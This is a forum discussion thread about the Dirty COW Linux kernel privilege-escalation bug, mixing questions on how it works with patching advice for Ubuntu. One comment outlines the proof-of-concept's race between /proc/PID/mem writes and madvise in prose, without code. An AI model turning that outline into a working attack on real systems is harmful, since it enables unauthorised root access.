I don't think that prevents this error. This exploit is all about gaining read-write access to a read-only page of memory. Mounting as read-only Might prevent the error, but only through extra checks of the dirty bit before pages are used (IE. The kernel would have to check the dirty bit on every page of a read-only file to ensure the contents were not changed through an exploit).

The state of the disk and mounting of the disk generally wouldn't matter because the page is already being forced from read to read/write, and that has no barring on the mounting of or data on the actual disk. It doesn't matter if this data is actually flushed to the disk as long as the kernel uses it from cache without noticing it has been changed (Which it probably doesn't check regardless of read-only status).

mjg59 · on Oct 20, 2016

Sadly, none of the security work we're doing would have helped in this case.

geofft · on Oct 20, 2016

Does this actually allow modifying the binary on disk, or just modifying the in-memory cached page? (i.e., is this a persistent attack that survives a reboot?)

startling · on Oct 20, 2016

It's just the in-memory executable, as I understand it.

Florin_Andrei · on Oct 20, 2016

How does mounting the partition read-only help with modifying binary images in memory?

anc84 · on Oct 20, 2016

How does having /usr on a seperate partition (if I understood you correctly) change the bug/exploit?

aexaey · on Oct 20, 2016

Good point, edited to clarify.

0xbadcafebee · on Oct 20, 2016

Fwiw, you should never think about an OS in terms of what security features they have enabled by default. The OS is almost always designed to help the user use programs and to help programs run. Just assume it is not secure until you do an audit + lockdown yourself.

If you want a secure system by default, you should probably not use Linux. I would go with OSX or OpenBSD to start.

(And finally: mounting /usr read-only isn't actually a security feature, because if you can exec code you can run a privesc and remount /usr read-write; mounting as noexec could arguably be considered a security feature)

caf · on Oct 20, 2016

OSX, really? It's had more than one privilege escalation exploitable from just a shell prompt (eg. the DYLD_PRINT_TO_FILE bug).

Not really surprising since it's overwhelmingly used in practice as a single-user system.

ams6110 · on Oct 20, 2016

OSX? How is that more secure by default than Linux?

0xbadcafebee · on Oct 20, 2016

Less published exploits. Okay, so "more secure" isn't exactly correct, maybe "more difficult for a 10 year old with Metasploit to own it"

vacri · on Oct 21, 2016

Who'd've thought that an OS that is rarely used to serve remote content is more resilient against software focused on breaking into remote systems?

saidajigumi · on Oct 20, 2016

See also the dedicated page for this vulnerability, dubbed Dirty COW (for copy-on-write), aka CVE-2016-5195:

http://dirtycow.ninja/

vesinisa · on Oct 20, 2016

Gotta love the dedication with the Dirty COW "swag" web shop and all. Though something tells to me it's just a strange in-joke. Might be the prices? ($1,000 for a mouse pad .. oh, really?)

kentonv · on Oct 20, 2016

It would appear that the creators of the web site are not even affiliated with the people who found or fixed the bug.

"Dirty COW is a community-maintained project for the bug otherwise known as CVE-2016-5195. It is not associated with the Linux Foundation, nor with the original discoverer of this vulnerability. If you would like to contribute go to GitHub."

Seems fishy.

Senji · on Oct 20, 2016

We live in a world where slightly arcane developer jokes are "SWAG squatted"

pmoriarty · on Oct 20, 2016

Whenever I see something being sold for outrageous amounts of money (like some book on Amazon which can be bought new for $40, but some people are selling used for $1400) my first suspicion is: money laundering.

aji · on Oct 20, 2016

it's definitely a joke. everything in the store is overpriced, FAQ item "how can I uninstall linux" links to a video of a guy smashing a computer, etc. look at this FAQ item:

    What's with the stupid (logo|website|twitter|github account)?

    It would have been fantastic to eschew this ridiculousness,
    because we all make fun of branded vulnerabilities too, but
    this was not the right time to make that stand. So we
    created a website, an online shop, a twitter account, and
    used a logo that a professional designer created.

I think the author is just snarking about either branded vulnerabilities or the hype that this issue is getting. or both?

h1d · on Oct 21, 2016

Definitely not funny for all the admins that had an emergency task to handle. This site needs some good updating.

Karunamon · on Oct 21, 2016

Yeah, agreed. This page is coming up on google searches now, and the first hit is something that downplays its seriousness in the name of meta-snark.

Very irresponsible on the part of the author. There's a time and a place for humor - this isn't it.

khy · on Oct 21, 2016

I was actually happy to see that the submitted link didn't point to the "marketing site" for the vulnerability.

escapologybb · on Oct 21, 2016

Okay, I have no idea what to do. Not a security engineer, can't follow what this thing does but I do have a couple of VPS's running my blog and a few other things. Now maybe there's an argument that I shouldn't be doing this if I don't completely understand all the ins and outs, but what the hell, I like learning about Linux.

So my question is: is simply updating and upgrading enough to protect me from this MOST DANGEROUS BUG EVER IN THE WORLD OH MY GOD YOU'RE GOING TO END UP PART OF A BOTNET AND HURT LITTLE CHILDREN!!1!!1! Which is how this reads to even a semi-technical reader, I mean I know my way around the command line but I'm at a loss as to what to do here.

Help me out HN please!

cm3 · on Oct 21, 2016

Since for any serious bug that's published, there's very likely a dozen private or not-yet-found, and also considering on how many networked devices the linux kernel is used, I would really like to see a better upgrade story for Android devices and any other linux-inside gear which doesn't have a distro package manager to apply the fix. As little as I like obstructing tech companies with more laws, especially since most laws don't understand the tech, I feel like laws are the only pressure we can hope for. This is why the abuse of IoT devices is a good thing. It will highlight how dangerous it is to slap a random linux version in some device and never bother with updates. A fleet of smart tvs needs to be hijacked with a stalker trojan that is then used by people to record and later post online private moments of unsuspecting owners of always standby smart tv, amazon echo networked microphones, etc. It's just how the world works before it realize the risks and does something about it.

As an engineer you can argue and plead with management to not release something that you don't intend to provide timely updates with a well-communicated support time. Like a 2 year warranty that's prominently communicated, this would highlight to consumers that it's unsafe to use the device unless disconnected from the network. Just like a car that doesn't pass your local safety regulations is not allowed into public traffic.

Actually, I'm surprised modern cars do not require periodic zero-expenses-for-the-owner software updates at licensed dealerships. You can explain to a driver that tires go bad because they drove X miles and have to be paid for, but you cannot argue that software updates need to be paid for because from the time they bought it Y days have passed. Take the Samsung battery optimization that went wrong, where the separation layer was a tiny bit too shallow. It's fair to assume some regulation will follow for safety purposes. Similarly, networked devices, which are not (and cannot be?) microcontrollers with mere 500 lines of code, have to be regulated in terms of software updates.

Now you may say the industry will go broke if they're required to provide upgrades, or less devices will be made, but I think this will lead to consolidation of the software stack, which is mostly a good thing, as those who want to produce dozens of cheap IoT devices can do so without hiring kernel developers. It's like other industries where cheap toy makers source materials like plastic from vendors, knowing it's safe, or create the materials following a detailed recipe which is certified.

necessity · on Oct 21, 2016

That's assuming the distributor warranted you against vulnerabilities in his product (and I remember seeing a "Distro X GNU/Linux comes with ABSOLUTELY NO WARRANTY" on every device I've used...). Forcing said warranty is preposterous.

Concerning smartphones there are so many privacy and security issues that are far easier to exploit than something that involves kernel hacking... But anyway, isn't Google rolling out security updates for Android? I use CM and I know they don't. There are projects like Replicant which provide a mostly free distribution, but I don't think they're rolling out security updates either. If you're interested maybe contact them?

cm3 · on Oct 21, 2016

Are the system (not app) updates Google releases applicable to all Android devices?

It's true that there are a high number of bugs available just in mobile browsers, which do receive google play updates, if you have google play, but viewing the underlying code as verified to be correct would be naive.

If I know that a smart phone or smart fridge will not get software updates and be substantially limited in functionality by that, I wouldn't pay more than 100 bucks for it, because I expect to buy another one in probably 14 months.

However, if the update problem would be fixed properly, I wouldn't mind paying a premium.

It seems that this isn't just laziness by the vendors but also calculated into nudging customers to buy new appliances and gadgets although the hardware is capable and perfectly fine. No vendor would admit to that, but this is being investigated and called planned obsolescence. If the price would reflect the artificially limited lifespan of a device, then the problem goes away, and it's just a matter how much of the materials gets recycled.

cheiVia0 · on Oct 21, 2016

Cool, this will be great for rooting Android phones to fix this and other security bugs!

joelthelion · on Oct 21, 2016

It's sad that anyone should have to rely on security bugs to take ownership of their own phone...

biafra · on Oct 21, 2016

These phones exist, because people are buying them. Other phones that allow unlocking the bootloader also exist.

Unklejoe · on Oct 21, 2016

Can someone help me better understand how this works, or perhaps point me to a decent article explaining more of the details? Most of the articles I can find just briefly explain the exploit, but not really how it works (in detail).

From looking at the example code, it seems like the general process is:

- Open some (normally un-writable) file as read-only and mmap it in to your process.

- Kick off two threads. One thread to repeatedly write to the same mmap-ed address via /proc/PID/mem and another thread to keep issuing the madvise call.

- Wait for some race condition to be (un)satisfied such that you're able to write to a cached copy of the file.

What I don’t fully understand is how the /proc/PID/mem thing works.

Here’s what I’m curious about:

1. What would happen if you tried to write to the mmap-ed region directly? Since it’s been mapped in with “PROT_READ”, does this mean that you’ll get a segmentation fault or something? From the manpage, it seems like “MAP_PRIVATE” allows it to be a COW mapping, but I don’t see how the combination of “PROT_READ” and “MAP_PRIVATE” is even valid. Unless this means that any writes to data copied from the mmap-ed region into other buffers will be COW-ed and that you can’t actually write to the mmap-ed region itself? That would make sense to me.

2.How is writing to /proc/PID/mem any different than writing through the mmap-ed region directly? Assume that you weren’t running the madvice thread. What would happen then if you tried to write to the /proc/PID/mem file? Presumably the same thing that happens if you just tried to write to the file directly…

3. Finally, how does the madvice call cause a race condition? I realize this might be a little too much to cover in a comment, but this seems like the meat of it.

kordless · on Oct 21, 2016

Curious that the original commit's hash to fix this was never indexed by Google: https://www.google.com/search?q=f33ea7f404e5&ie=utf-8&oe=utf...

i336_ · on Oct 21, 2016

It is now, I see 16 results.

antocv · on Oct 21, 2016

You said it mon, "curious".

Hello71 · on Oct 21, 2016

Doesn't seem like it works on a $10 DigitalOcean droplet (1 vCPU) with grsec-patched 4.4.8. After running for quite some time (which I suspect a system administrator would notice) "cat foo" still outputs the same contents.

lima · on Oct 21, 2016

Spender himself said that Grsecurity doesn't help with that one. Maybe it breaks that particular proof of concept.

i336_ · on Oct 21, 2016

I think the "it" you refer to here would be interesting to quite a few people, I'm having a hard time finding it.

coldpie · on Oct 21, 2016

How much is "quite some time"? It ran for several minutes before eventually succeeding on my fast, modern desktop.

Hello71 · on Oct 21, 2016

The loops finished.

amscanne · on Oct 22, 2016

Not sure if the race can be triggered with a single CPU.

AznHisoka · on Oct 21, 2016

I wish someone could explain in simpler terms to us casual users what this means.

If only privileged users can SSH into my server, does this really affect me? In other words, I already allow only SSH users to become root.

pbhjpbhj · on Oct 20, 2016

If I'm reading this correctly it works only when there's already access to a user account on the system. So you need to have an existing vulnerability already [eg an untrusted user].

Interesting whether it will give new root exploits for Android as suggested in the comments.

alltakendamned · on Oct 21, 2016

Yes, that is exactly what a privilege escalation bug is.

winter_blue · on Oct 21, 2016

If one's running an LTS version of Ubuntu like 14.04 or 16.04, can one can expect to get an update with the security patch for this?

I'm running Kubuntu 14.04 with the latest security updates, and I'm still on kernel version 3.13.0-98-generic.

    ~ $ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 14.04.5 LTS
    Release:        14.04
    Codename:       trusty

    ~ $ uname -a
    Linux anon-pc 3.13.0-98-generic #145-Ubuntu SMP Sat Oct 8 20:13:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

No idea why I haven't gotten an update to 4.x. Should I just switch to a rolling release distro like Arch to have the latest updates of everything?

forbiddenlake · on Oct 21, 2016

Hours ago. apt-get update && apt-get upgrade.

https://www.ubuntu.com/usn/usn-3105-1/ http://people.canonical.com/~ubuntu-security/cve/2016/CVE-20...

winter_blue · on Oct 21, 2016

It looks like my kernel updates are being held back:

    ~ $ sudo apt-get upgrade
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    Calculating upgrade... Done
    The following packages have been kept back:
      ffmpeg libva1 linux-generic linux-headers-generic linux-image-generic
    0 upgraded, 0 newly installed, 0 to remove and 6 not upgraded.

The newest available version of linux-image-generic according to apt-cache showpkg is 3.13.0.100.108. (I'm running 3.13.0.98 right now.) Maybe 3.13.100 has the fix to this bug, but I'll have to figure out what's keeping back linux-kernel-image from being updated.

What's really puzzling though is that I should have kernle 4.4.x, since I'm running Ubuntu 14.04.5, according to the Ubuntu Wiki: https://wiki.ubuntu.com/Kernel/Support#A14.04.x_Ubuntu_Kerne... It's strange that my Kubuntu installation is frozen on 3.13.x.

ivank · on Oct 21, 2016

Note the "HWE" (hardware enablement) on that chart. Ubuntu 14.04 came with 3.13; if you want a 4.4 kernel, you have to install linux-generic-lts-xenial.

winter_blue · on Oct 21, 2016

Thanks, that answers my question! Installing linux-generic-lts-xenial should let me get the 4.4.x kernel on Ubuntu 14.04.

I might still switch to Arch Linux. It's been a hassle to get the latest releases of various packages (like python, gcc, etc). I've had to use third-party PPAs or manually install them. Ubuntu's freezing of packages makes it great as a base image for Docker containers and other reliably reproducible deployment scenarios, but that's not so great as a regular desktop user.

csdreamer7 · on Oct 21, 2016

I have been using Antergos (Desktop friendly Arch) on and off for a while. If you haven't updated for a while, it could cause problems. After I updated after staying off it for two months I had an x crash. Restarted, no problems, all updates installed.

Chris from LAS does say I believe in User Error 6 or 7 that if you don't update Arch in a while you could have stability issues when you update.

coldpie · on Oct 21, 2016

I strongly recommend Arch, we'd be glad to have you.

justinsaccount · on Oct 21, 2016

..because you don't know the difference between upgrade and dist-upgrade.

use dist-upgrade or just explicitly install those packages.

winter_blue · on Oct 21, 2016

No, dist-upgrade would be 14.04 -> 16.04.

I don't want 16.04; I want to stay on 14.04.

quesera · on Oct 21, 2016

> No, dist-upgrade would be 14.04 -> 16.04.

That is a reasonable assumption, but it is incorrect. Check the man page for apt-get.

On Ubuntu systems, the command to upgrade to a new release is "do-release-upgrade". Insanity, but there it is.

lathiat · on Oct 22, 2016

This is indeed a point of confusion. dist-upgrade basically allows adding new packages, or removal of old packages. upgrade does not, this includes the versioned kernel packages. I suspect (possibly unfoundedly) that the command was originally named because this generally happened when doing such distrubution upgrades, but it's not what it actually does.

If you're always reviewing it manually it's ok to just use dist-upgrade, alternative if you want to install new packages but still not let it remove packages, you can use: sudo apt-get upgrade --with-new-pkgs

Personally I always just use dist-upgrade and it's not a problem as long as you check it before you hit go.

forbiddenlake · on Oct 21, 2016

Sorry, instead of "upgrade" I should have typed `full-upgrade` (which is the same thing as `dist-upgrade` and is unrelated to moving major distro versions)

Florin_Andrei · on Oct 21, 2016

Most of my 16.04 instances that are configured to auto-update have installed the new kernel already.

winter_blue · on Oct 21, 2016

I've set up cron jobs in the past which automatically ran apt-get update && apt-get upgrade, but it's sometimes caused things to unpredictably break, especially when you have the backports PPA.

After things randomly broke 3 times I decided not to add the backports PPA, and to do manual updates every now and then.